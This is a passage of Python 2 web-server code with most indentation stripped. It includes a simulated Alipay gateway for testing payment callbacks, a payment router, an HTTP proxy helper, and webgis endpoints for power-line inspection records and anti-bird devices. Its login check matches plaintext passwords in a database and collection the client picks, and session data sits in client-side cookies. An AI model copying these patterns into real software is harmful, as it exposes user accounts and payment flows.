#collection = gConfig['chat_platform']['mongodb']['collection_session'],
#)
#is_expire = False
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
else:
#with session_manager(environ):
#sess, cookie_header, is_expire = check_session(environ, gRequest, gSessionStore)
#if is_expire:
#headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
#statuscode = '200 OK'
#body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
#if sess:
#if not sess.has_key('ip'):
#sess['ip'] = environ['REMOTE_ADDR']
#gSessionStore.save_if_modified(sess)
#else:
statuscode, headers, body = handle_chat_platform(environ, None)
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def sign_and_send(thirdpay, method, href, data, need_sign=True):
ret = None
if thirdpay == 'alipay':
ret = sign_and_send_alipay(method, href, data, need_sign)
return ret
def sign_and_send_alipay(method, href, data, need_sign=True):
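    # build the alipay query string, append sign/sign_type when need_sign is set, encode it with
    # the configured input_charset and send it to `href` in a spawned greenlet (GET appends the
    # quoted query string, POST sends it as a form body); returns the greenlet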
global gConfig
qs = build_query_string(data)
if need_sign:
signed = get_sign_alipay(qs)
qs += '&sign=%s' % signed
qs += '&sign_type=%s' % gConfig['pay_platform']['alipay']['sign_type']
text = qs
text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text)
connection_timeout, network_timeout = float(gConfig['pay_platform']['alipay']['connection_timeout']), float(gConfig['pay_platform']['alipay']['network_timeout'])
client = HTTPClient.from_url(href, concurrency=1, connection_timeout=connection_timeout, network_timeout=network_timeout, )
g = None
if method == 'get':
if not href[-1:] == '?':
href += '?'
href += urllib.quote(text)
g = gevent.spawn(client.get, href)
if method == 'post':
postdata = urllib.quote(text)
headers = {}
headers['Content-Type'] = 'application/x-www-form-urlencoded; text/html; charset=%s' % str(gConfig['pay_platform']['alipay']['input_charset'])
g = gevent.spawn(client.post, href, body=postdata, headers=headers)
return g
def fake_gateway_alipay_return(querydict):
global gConfig
sign_data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
sign_data['is_success'] = 'T'
#sign_data['refund_result'] = 'TRADE_PENDING'
elif querydict['service'] == 'create_direct_pay_by_user':
if querydict.has_key('out_trade_no'):
sign_data['is_success'] = 'T'
sign_data['notify_id'] = str(ObjectId())
sign_data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sign_data['notify_type'] = 'trade_status_sync'
sign_data['out_trade_no'] = querydict['out_trade_no']
sign_data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('seller_email'):
sign_data['seller_email'] = querydict['seller_email']
if querydict.has_key('subject'):
sign_data['subject'] = querydict['subject']
if querydict.has_key('buyer_email'):
sign_data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('total_fee'):
sign_data['total_fee'] = querydict['total_fee']
#sign_data['trade_no'] = ''
sign_data['trade_status'] = 'TRADE_PENDING'
href = str(gConfig['pay_platform']['alipay']['return_url'])
if querydict.has_key('return_url'):
href = querydict['return_url']
sign_and_send_alipay('get', href, sign_data)
else:
print('fake_gateway_alipay_return out_trade_no required')
def fake_gateway_alipay_notify(querydict):
global gConfig
def get_pay_log_rec_by_trade_no(trade_no):
ret = None
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if 'pay_log' in db.collection_names(False):
collection = db['pay_log']
ret = collection.find_one({"trade_no":trade_no})
return ret
data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'batch_refund_notify'
data['notify_id'] = str(ObjectId())
data['batch_no'] = querydict['batch_no']
data['success_num'] = '1'
detail_data = querydict['detail_data']
arr = detail_data.split('^')
trade_no = arr[0]
refund_fee = float(arr[1])
result_details = '%s^%s^%s' % (arr[0], arr[1], 'SUCCESS')
data['result_details'] = result_details
href = str(gConfig['pay_platform']['alipay']['notify_url'])
sign_and_send_alipay('post', href, data)
rec = get_pay_log_rec_by_trade_no(trade_no)
if rec:
data = {}
data['notify_type'] = 'trade_status_sync'
data['out_trade_no'] = rec['out_trade_no']
data['refund_status'] = 'REFUND_SUCCESS'
if refund_fee < rec['total_fee']:
data['trade_status'] = 'TRADE_SUCCESS'
else:
data['trade_status'] = 'TRADE_CLOSED'
sign_and_send_alipay('post', href, data)
elif querydict['service'] == 'create_direct_pay_by_user':
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
data['notify_id'] = str(ObjectId())
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'trade_status_sync'
data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('buyer_email'):
data['buyer_email' ] = querydict['buyer_email']
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if querydict.has_key('paymethod') and querydict['paymethod'] == 'bankPay':
data['bank_seq_no'] = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
data['trade_no'] = datetime.datetime.now().strftime("%Y%m%d%H%M%S") + str(ObjectId())
data['trade_status'] = 'TRADE_SUCCESS'
href = str(gConfig['pay_platform']['alipay']['notify_url'])
sign_and_send_alipay('post', href, data)
else:
print('fake_gateway_alipay_notify out_trade_no required')
def fake_gateway_alipay_error_notify(querydict, error_code):
global gConfig
data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'batch_refund_notify'
data['notify_id'] = str(ObjectId())
data['batch_no'] = querydict['batch_no']
data['success_num'] = '0'
detail_data = querydict['detail_data']
arr = detail_data.split('^')
result_details = '%s^%s^%s' % (arr[0], arr[1], error_code)
data['result_details'] = result_details
href = str(gConfig['pay_platform']['alipay']['notify_url'])
if querydict.has_key('notify_url'):
href = str(querydict['notify_url'])
sign_and_send_alipay('post', href, data)
elif querydict['service'] == 'create_direct_pay_by_user':
data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
data['error_code'] = error_code
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
href = str(gConfig['pay_platform']['alipay']['error_notify_url'])
sign_and_send_alipay('post', href, data, need_sign=False)
else:
print('fake_gateway_alipay_error_notify out_trade_no required')
def dec_by_code(code, string):
encode, decode, reader, writer = codecs.lookup(str(code))
text = string
text, length = decode(text, 'replace')
return text
def enc_by_code(code, string):
encode, decode, reader, writer = codecs.lookup(str(code))
text = string
text, length = encode(text, 'replace')
return text
def handle_fake_gateway_alipay(environ, error_code_pay=None, error_code_refund=None):
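    # simulated alipay gateway endpoint: parses the incoming request (GET query or POST body),
    # immediately fires the return_url callback for direct pay, answers refund requests with a
    # success XML body, then checks the signature and, after the configured delay, replays the
    # notify or error-notify callbacks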
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
d = {}
querydict = {}
querystring = ''
querystring1 = ''
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querydict = urlparse.parse_qs(querystring)
for key in querydict.keys():
d[key] = querydict[key][0]
querydict = d
if not environ.has_key('QUERY_STRING') or len(environ['QUERY_STRING'])==0:
buf = environ['wsgi.input'].read()
querystring = urllib.unquote_plus(buf)
querystring = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], querystring)
querydict = urlparse.parse_qs(querystring)
d = {}
for key in querydict.keys():
d[key] = querydict[key][0]
querydict = d
try:
querystring1 = querystring[:querystring.index('&sign=')]
except:
pass
try:
querystring1 = querystring1[:querystring1.index('&sign_type=')]
except:
pass
signed1 = None
if querydict['service'] == 'create_direct_pay_by_user':
fake_gateway_alipay_return(querydict)
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
body = '<?xml version="1.0" encoding="UTF-8"?><IS_SUCCESS>T</IS_SUCCESS>'
gevent.sleep(float(gConfig['fake_gateway_alipay']['alipay']['process_second']))
#print(querydict)
if querydict.has_key('sign') and querydict.has_key('sign_type') and querydict.has_key('_input_charset'):
ok = check_sign_alipay(querydict['_input_charset'], querydict['sign'], querydict['sign_type'], querystring1)
if ok:
error_code = error_code_pay
if error_code is None:
error_code = error_code_refund
if error_code:
fake_gateway_alipay_error_notify(querydict, error_code)
else:
fake_gateway_alipay_notify(querydict)
else:
print('signature check error')
fake_gateway_alipay_error_notify(querydict, 'ILLEGAL_SIGN')
else:
print('need sign or sign_type or _input_charset')
return statuscode, headers, body
def application_fake_gateway_alipay(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gSecurityConfig
headers = {}
headerslist = []
body = ''
statuscode = '200 OK'
path_info = environ['PATH_INFO']
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif path_info == '/gateway.do':
error_code_pay = gConfig['fake_gateway_alipay']['alipay']['error_code_pay']
error_code_refund = gConfig['fake_gateway_alipay']['alipay']['error_code_refund']
if len(error_code_pay) == 0:
error_code_pay = None
if error_code_pay and not gSecurityConfig['alipay']['error_code'].has_key(error_code_pay):
error_code_pay = None
if len(error_code_refund) == 0:
error_code_refund = None
if error_code_refund and not gSecurityConfig['alipay']['error_code'].has_key(error_code_refund):
error_code_refund = None
statuscode, headers, body = handle_fake_gateway_alipay(environ, error_code_pay, error_code_refund)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
start_response(statuscode, headerslist)
return [body]
def application_pay_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gWebSocketsMap, gJoinableQueue
def check_is_static(aUrl):
ret = False
surl = dec(aUrl)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
        p = os.path.join(STATICRESOURCE_DIR, surl)
        if '.' in surl:
            ext = surl[surl.rindex('.'):]
        else:
            ext = os.path.splitext(p)[1]
if len(ext)>0 and gConfig['mime_type'].has_key(ext):
ret = True
return ret
def handle_websocket(environ):
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
headers = {}
headerslist = []
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
headerslist = []
statuscode = '200 OK'
#print('path_info=%s' % path_info)
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif path_info == '/pay':
statuscode, headers, body = handle_pay(environ)
elif path_info == '/refund':
statuscode, headers, body = handle_refund(environ)
elif path_info == '/query':
statuscode, headers, body = handle_pay_getinfo(environ)
elif path_info == '/alipay_return_url':
headerslist.append(('Content-Type', 'text/plain;charset=' + ENCODING))
handle_alipay_return_url(environ)
elif path_info == '/alipay_notify_url':
headerslist.append(('Content-Type', 'text/plain;charset=' + ENCODING))
handle_alipay_notify_url(environ)
body = 'success'
elif path_info == '/alipay_error_notify_url':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
handle_alipay_error_notify_url(environ)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
if path_info == '/websocket':
handle_websocket(environ)
return [body]
def handle_http_proxy(environ, proxy_placeholder='proxy', real_protocol='http', real_host='localhost', real_port='80', token='', connection_timeout=5.0, network_timeout=10.0, request_headers={}):
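    # forward the current request to real_protocol://real_host:real_port with the proxy
    # placeholder stripped from the path and a token/random query pair appended; the upstream
    # body and headers are returned under a '200 OK' status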
global ENCODING, gHttpClient, gRequest, gProxyRequest
path_info = environ['PATH_INFO']
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
path_info += '?' + environ['QUERY_STRING']
request = None
if gProxyRequest is None:
request = Request(environ)
else:
request = gProxyRequest
method = request.method.lower()
data = request.get_data()
headers = {}
for i in request.headers:
headers[i[0]] = enc(i[1])
for k in request_headers.keys():
headers[k] = request_headers[k]
headers['Host'] = real_host
#for k in headers.keys():
#print('%s=%s' % (k, headers[k]))
href = '%s://%s:%s%s' % (real_protocol, real_host, real_port, path_info.replace('/%s/' % proxy_placeholder, '/'))
if '?' in href:
href += '&'
else:
href += '?';
href += 'token=%s&random=%d' % ( token, random.randint(0,100000) )
print('proxy to %s' % href)
header = {'Content-Type': 'application/json;charset=' + ENCODING, 'Cache-Control': 'no-cache'}
ret = ''
url = URL(href)
if not gHttpClient.has_key('http_proxy'):
gHttpClient['http_proxy'] = HTTPClient(url.host, port=url.port, connection_timeout=connection_timeout, network_timeout=network_timeout, concurrency=200)
client = gHttpClient['http_proxy']
response = None
try:
if method == 'get':
response = client.get(url.request_uri, headers)
elif method == 'put':
response = client.put(url.request_uri, data, headers)
elif method == 'delete':
response = client.delete(url.request_uri, data, headers)
elif method == 'post':
response = client.post(url.request_uri, data, headers)
except Exception,e:
idx = 0
e1 = e
        # retry a few times on Windows connection-reset errors (WSAECONNABORTED 10053 / WSAECONNRESET 10054)
        while getattr(e1, 'errno', None) in (10053, 10054) and idx < 4:
            idx += 1
            print('encounter socket error %s, trying %d reconnecting...' % (e1.errno, idx))
try:
if method == 'get':
response = client.get(url.request_uri, headers)
elif method == 'put':
response = client.put(url.request_uri, data, headers)
elif method == 'delete':
response = client.delete(url.request_uri, data, headers)
elif method == 'post':
response = client.post(url.request_uri, data, headers)
break
except Exception,e2:
e1 = e2
        if response is None:
            raise e1
if response:
if hasattr(response, 'status_code'):
if response.status_code == 200 or response.status_code == 304:
ret = response.read()
# print(ret)
header = {}
for k in response._headers_index.keys():
if not k in ['transfer-encoding', ]:
v = response._headers_index[k]
if '-' in k:
k = '-'.join([i.capitalize() for i in k.split('-')])
else:
k = k.capitalize()
header[k] = v
else:
msg = 'handle_http_proxy response error:%d' % response.status_code
ret = json.dumps({'result':msg}, ensure_ascii=True, indent=4)
#raise Exception(msg)
else:
raise Exception('handle_http_proxy error: response has no status_code')
else:
raise Exception('handle_http_proxy error')
return '200 OK', header, ret
def application_webgis(environ, start_response):
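    # WSGI handler for the webgis app; the nested helpers below cover the websocket loop,
    # proxying to the anti_bird service, cookie/session handling and the state-examination,
    # anti-bird and bayesian endpoints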
global ENCODING
global gConfig, gRequest, gSessionStore, gWebSocketsMap
def handle_websocket(environ):
key = str(gevent.getcurrent().__hash__())
ws = get_websocket(environ)
if not gWebSocketsMap.has_key(key):
gWebSocketsMap[key] = ws
app = gConfig['wsgi']['application']
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
if obj['op'] == 'turn_on_sound':
ws.send('')
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
return '200 OK', {}, ''
def proxy(environ, request_headers={}):
global gConfig
connection_timeout, network_timeout = 5.0, 10.0
try:
connection_timeout = float(gConfig['webgis']['anti_bird']['www_connection_timeout'])
except:
pass
try:
network_timeout = float(gConfig['webgis']['anti_bird']['www_network_timeout'])
except:
pass
token = md5.new('bird%s' % time.strftime('%Y%m%d')).hexdigest()
path_info = environ['PATH_INFO']
if '/hasBird' in path_info:
request_headers['Content-Type'] = 'application/json'
return handle_http_proxy(environ, 'proxy', 'http', gConfig['webgis']['anti_bird']['tcp_host'], gConfig['webgis']['anti_bird']['http_port'], token, connection_timeout, network_timeout, request_headers)
# def get_anti_bird_list_from_cache():
# ret = '{"result":"get_anti_bird_list_from_cache_error:cannot connect to db"}'
# arr = []
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('mongodb'):
# db_util.mongo_init_client('anti_bird')
# db = db_util.gClientMongo['anti_bird'][gConfig['webgis']['anti_bird']['mongodb']['database']]
# collection = db[gConfig['webgis']['anti_bird']['mongodb']['detector_collection']]
# arr = db_util.remove_mongo_id(list(collection.find({})))
# ret = json.dumps(arr, ensure_ascii=True, indent=4)
# return ret
#
# def get_latest_records_from_cache():
# ret = '{"result":"get_latest_records_from_cache_error:cannot connect to db"}'
# arr = []
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('mongodb'):
# db_util.mongo_init_client('anti_bird')
# db = db_util.gClientMongo['anti_bird'][gConfig['webgis']['anti_bird']['mongodb']['database']]
# collection = db[gConfig['webgis']['anti_bird']['mongodb']['detector_collection']]
# arr = db_util.remove_mongo_id(list(collection.find({})))
# ret = json.dumps(arr, ensure_ascii=True, indent=4)
# return ret
def set_cookie(key, value):
secure = False
if gConfig['listen_port']['enable_ssl'].lower() == 'true':
secure = True
        # default session age (seconds) used when the configured value is missing or invalid
        session_age = 60
        try:
            session_age = int(gConfig['webgis']['session']['session_age'])
        except:
            pass
# cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['webgis']['session']['session_domain']), max_age=session_age, secure=secure))
cookie = ('Set-Cookie', dump_cookie(key, value, max_age=session_age, secure=secure))
return cookie
def get_cookie_data(request, key=None):
string = '{}'
if request:
string = request.cookies.get('session_data')
ret = None
if string and len(string)>0:
try:
ret = json.loads(string)
if key and ret.has_key(key):
ret = ret[key]
else:
ret = None
except:
pass
return ret
def set_cookie_data(request, data):
string = '{}'
ret = None
if request:
string = request.cookies.get('session_data')
if string and len(string)>0:
try:
obj = json.loads(string)
if isinstance(obj, dict) and isinstance(data, dict):
for key in data.keys():
obj[key] = data[key]
string = json.dumps(obj)
ret = set_cookie('session_data', string)
except:
pass
return ret
def session_handle(environ, request, session_store):
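        # resolve the session id stored in the 'session_data' cookie: create a fresh session and
        # cookie when it is missing, refresh the cookie (minus the password field) when the session
        # is found, and flag the session as expired otherwise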
sid = get_cookie_data(request, 'session_id')
sess = None
cookie = None
is_expire = False
if sid is None or len(sid)==0:
request.session = session_store.new()
# session_store.save(request.session)
sess = request.session
cookie = set_cookie_data(None, {'session_id': request.session.sid})
is_expire = True
else:
request.session = session_store.get(sid)
if request.session:
o = {'session_id': request.session.sid}
for k in request.session.keys():
if not k in [u'password',]:
o[k] = request.session[k]
cookie = set_cookie_data(request, o)
session_store.save_if_modified(request.session)
else:
cookie = set_cookie('session_data', '{}')
is_expire = True
# if request.session.should_save:
# session_store.save(request.session)
sess = request.session
return sess, cookie, is_expire
def handle_login(environ):
ret = None
querydict, buf = get_querydict_by_GET_POST(environ)
if querydict.has_key('db') and querydict.has_key('collection') and querydict.has_key('username') and querydict.has_key('password'):
ret = db_util.mongo_find_one(querydict['db'],
querydict['collection'],
{'username':querydict['username'],
'password':querydict['password']})
return ret
def handle_state_examination(environ):
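        # endpoints for the state_examination collection: save (single record or list), query,
        # delete (single id or id list) and the distinct line-name listing, dispatched via gUrlMap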
def get_collection(collection):
ret = None
db_util.mongo_init_client('webgis')
db = db_util.gClientMongo['webgis'][gConfig['webgis']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def state_examination_save(querydict):
def modifier(adict = {}):
for k in adict.keys():
if not k in ['_id', 'check_year']:
adict[k] = adict[k].strip()
if k == 'line_name':
adict[k] = adict[k].replace('-', '')\
.replace('500kV', '').replace('220kV', '').replace('110kV', '').replace('35kV', '').replace('10kV', '')\
.replace(u'Ⅱ', 'II').replace(u'Ⅰ', 'I')
if adict[k][-1] == u'回':
adict[k] = adict[k].replace( u'回', u'回线')
if not adict[k][-1] == u'线':
adict[k] = adict[k] + u'线'
if k == 'line_state' or 'unit_' in k:
adict[k] = adict[k].replace(u'正常', 'I').replace(u'注意', 'II').replace(u'异常', 'III').replace(u'严重', 'IV')
return adict
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict) and querydict.has_key('line_name') and querydict.has_key('check_year'):
querydict['line_name'] = querydict['line_name'].strip()
existone = collection.find_one({'line_name':querydict['line_name'].strip(), 'check_year':querydict['check_year']})
if existone:
querydict['_id'] = str(existone['_id'])
querydict = modifier(querydict)
_id = collection.save(db_util.add_mongo_id(querydict))
ret = collection.find_one({'_id':_id})
if ret:
ret = db_util.remove_mongo_id(ret)
if isinstance(querydict, list):
for i in querydict:
i = modifier(i)
existone = collection.find_one({'line_name':i['line_name'], 'check_year':i['check_year']})
if existone:
i['_id'] = str(existone['_id'])
collection.save(db_util.add_mongo_id(i))
return json.dumps(ret, ensure_ascii=True, indent=4)
def state_examination_query_line_names(querydict):
ret = []
collection = get_collection('state_examination')
pipeline = [
# {'$unwind':'$line_name'},
{"$group": {"_id": "$line_name", "count": {"$sum": 1}}},
]
ret = list(collection.aggregate(pipeline))
ret = map(lambda x:x['_id'], ret)
return json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
def state_examination_query(querydict):
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict):
# print(querydict)
ret = list(collection.find(db_util.add_mongo_id(querydict)))
return json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
def state_examination_delete(querydict):
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict):
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'record_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
return json.dumps(ret, ensure_ascii=True, indent=4)
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if endpoint == 'state_examination_save':
body = state_examination_save(querydict)
elif endpoint == 'state_examination_query':
body = state_examination_query(querydict)
elif endpoint == 'state_examination_delete':
body = state_examination_delete(querydict)
elif endpoint == 'state_examination_query_line_names':
body = state_examination_query_line_names(querydict)
return statuscode, headers, body
def handle_antibird(environ):
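        # anti-bird device endpoints: list devices through the proxy (optionally hiding ones
        # already bound to towers), fetch a device's latest records (rewriting picture links to
        # the image proxy) and map imei numbers to tower name/coordinates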
global gConfig, gUrlMap, ENCODING
def init_list(environ):
ret = []
s = '{"result":"unknown how to get anti bird list"}'
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('fetch_from_www') and gConfig['webgis']['anti_bird']['fetch_from_www'].lower() == 'true':
if True:
environ['PATH_INFO'] = '/proxy/api/detector'
environ['QUERY_STRING'] = ''
code, header, s = proxy(environ)
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('fetch_from_www') and gConfig['webgis']['anti_bird']['fetch_from_www'].lower() == 'false':
# if False:
# s = get_anti_bird_list_from_cache()
try:
if len(s)>0:
obj = json.loads(s)
if isinstance(obj, dict) :
if obj.has_key('result'):
print('antibird/init_list error:%s' % obj['result'])
else:
if obj.has_key('_id'):
if obj.has_key('imei'):
obj['label'] = obj['imei']
obj['value'] = obj['imei']
ret = [obj, ]
else:
print('antibird/init_list error: unknown error')
ret = []
elif isinstance(obj, list) :
for i in obj:
idx = obj.index(i)
if i.has_key('imei'):
i['label'] = i['imei']
i['value'] = i['imei']
obj[idx] = i
ret = obj
except Exception,e:
raise
return ret
def get_latest_records(environ, querydict):
ret = []
objstr = ''
if querydict.has_key('imei') and len(querydict['imei'])>0:
records_num = 1
if querydict.has_key('records_num') and len(querydict['records_num'])>0:
records_num = int(querydict['records_num'])
href = '/proxy/api/detector/%s/log/%d' % (querydict['imei'], records_num)
environ['PATH_INFO'] = href
environ['QUERY_STRING'] = ''
status, header, objstr = proxy(environ)
if len(objstr)>0:
try:
obj = json.loads(objstr)
if isinstance(obj, dict) :
if obj.has_key('result'):
print('antibird/get_latest_records error:%s' % obj['result'])
else:
if obj.has_key('_id'):
ret = [obj, ]
else:
print('antibird/get_latest_records error: unknown error')
ret = []
elif isinstance(obj, list) :
ret = obj
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
print('antibird/get_latest_records error:%s' % e.message)
else:
print('antibird/get_latest_records error:%s' % str(e))
for item in ret:
idx = ret.index(item)
if item.has_key('picture') and isinstance(item['picture'], list):
for i in item['picture']:
idx1 = item['picture'].index(i)
item['picture'][idx1] = '/proxy/api/image/%s' % i
ret[idx] = item
return ret
def get_latest_records_by_imei(environ, querydict):
ret = get_latest_records(environ, querydict)
return json.dumps(ret, ensure_ascii=True, indent=4)
def get_equip_list(environ, querydict):
ret = ''
is_filter_used=False
if querydict.has_key('is_filter_used') and querydict['is_filter_used'] is True:
is_filter_used = True
equip_list = init_list(environ)
if not is_filter_used:
ret = json.dumps(equip_list, ensure_ascii=True, indent=4)
else:
exist = []
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置"
}
}
},
0,
'webgis'
)
for i in l:
for j in i['properties']['metals']:
if isinstance(j, dict) and j.has_key('imei'):
if not j['imei'] in exist:
exist.append(j['imei'])
while len(exist)>0:
i0 = exist[0]
for i in equip_list:
if i['imei'] == i0:
equip_list.remove(i)
exist.remove(i0)
break
ret = json.dumps(equip_list, ensure_ascii=True, indent=4)
return ret
def equip_tower_mapping(querydict):
ret = {}
if querydict.has_key('imei'):
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置",
"imei":querydict['imei']
}
}
},
0,
'webgis'
)
if len(l)>0:
obj = {}
obj['tower_id'] = l[0]['_id']
obj['name'] = l[0]['properties']['name']
obj['lng'] = l[0]['geometry']['coordinates'][0]
obj['lat'] = l[0]['geometry']['coordinates'][1]
obj['alt'] = l[0]['geometry']['coordinates'][2]
ret[querydict['imei']] = obj
else:
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置",
}
}
},
0,
'webgis'
)
for i in l:
for j in i['properties']['metals']:
if j.has_key('type') and j['type'] == u'多功能驱鸟装置' and j.has_key('imei') and len(j['imei'])>0:
obj = {}
obj['tower_id'] = i['_id']
obj['name'] = i['properties']['name']
obj['lng'] = i['geometry']['coordinates'][0]
obj['lat'] = i['geometry']['coordinates'][1]
obj['alt'] = i['geometry']['coordinates'][2]
ret[j['imei']] = obj
ret = json.dumps(ret, ensure_ascii=True, indent=4)
return ret
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if args.has_key('imei') and isinstance(querydict, dict):
querydict['imei'] = args['imei']
if args.has_key('records_num') and isinstance(querydict, dict):
querydict['records_num'] = args['records_num']
if endpoint == 'get_equip_list':
body = get_equip_list(environ, querydict)
elif endpoint == 'get_latest_records_by_imei':
body = get_latest_records_by_imei(environ, querydict)
elif endpoint == 'equip_tower_mapping':
body = equip_tower_mapping(querydict)
return statuscode, headers, body
def handle_bayesian(environ):
def get_collection(collection):
ret = None
db_util.mongo_init_client('webgis')
db = db_util.gClientMongo['webgis'][gConfig['webgis']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
# def convert_strkey_to_bool(obj):
# if isinstance(obj, list):
# for i in range(0, len(obj)):
